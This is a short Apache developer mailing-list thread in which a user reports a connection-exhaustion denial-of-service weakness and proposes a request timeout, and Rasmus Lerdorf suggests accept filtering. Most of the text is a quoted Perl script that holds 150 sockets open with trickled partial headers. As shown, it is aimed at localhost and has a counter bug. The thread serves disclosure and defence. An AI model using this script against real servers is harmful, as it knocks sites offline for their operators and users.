It doesn't.
Rasmus Lerdorf wrote:
> Turn on accept filtering and this problem goes away. Or at least it
> moves to be a kernel-level issue instead of an Apache one.
>
> -Rasmus
>
> Ivan Barrera A. wrote:
>
>> Hi...
>>
>> I'm still fighting (probably for a lost cause.. but my boss ask me to
>> do this).
>> In the socket activity there are some troubles dealing with timeouts.
>> It is pretty easy to Anyone DoS any apache webserver.
>> I want to propose implementing a request timeout time, or at least a
>> check for incoming data.
>>
>> If you open many sockets to an apache server, you can keep it alive,
>> and make apache keep it open for a looong time, eating resources. If you
>> limit the numbers of conecctions per ip, you still can DoS apache using
>> 2 or more other ips.
>>
>> All this was tedtes with Timeout set to 20, KeepAlive set to 5, and all
>> relevant options to their lowest value.
>>
>>
>> (one of the common scrips used to kill apache, is apache-squ1rt, i use
>> this other to test)
>> Use this perl script to test :
>>
>> #!/usr/bin/perl
>>
>> my $Child = 150;
>> my $Sleep = 10;
>>
>> use IO::Socket;
>> use strict;
>>
>> my($c);
>> my(@SOCKET);
>> my($t);
>>
>> local $| = 1;
>>
>> $c=0;
>> for(0..$Child) {
>> @SOCKET[$c] = new IO::Socket::INET( Proto => "tcp",
>> PeerAddr=> "127.0.0.1:80");
>> $c++;
>> }
>>
>> for(0..$Child) {
>> if ( defined @SOCKET[$c]) {
>> $t = @SOCKET[$c];
>> print $t "GET / HTTP/1.1";
>> }
>> }
>>
>>
>> while(1){
>> $c=0;
>> # For each children
>> for(0..$Child) {
>> if ( defined @SOCKET[$c]) {
>> $t = @SOCKET[$c];
>> print $t "host: test.test";
>> }
>> $c++;
>> }
>> sleep ($Sleep);
>> }
>>
>> $c=0;
>> for(0..$Child) {
>> close(@SOCKET[$c++]);
>> }
>
>
>
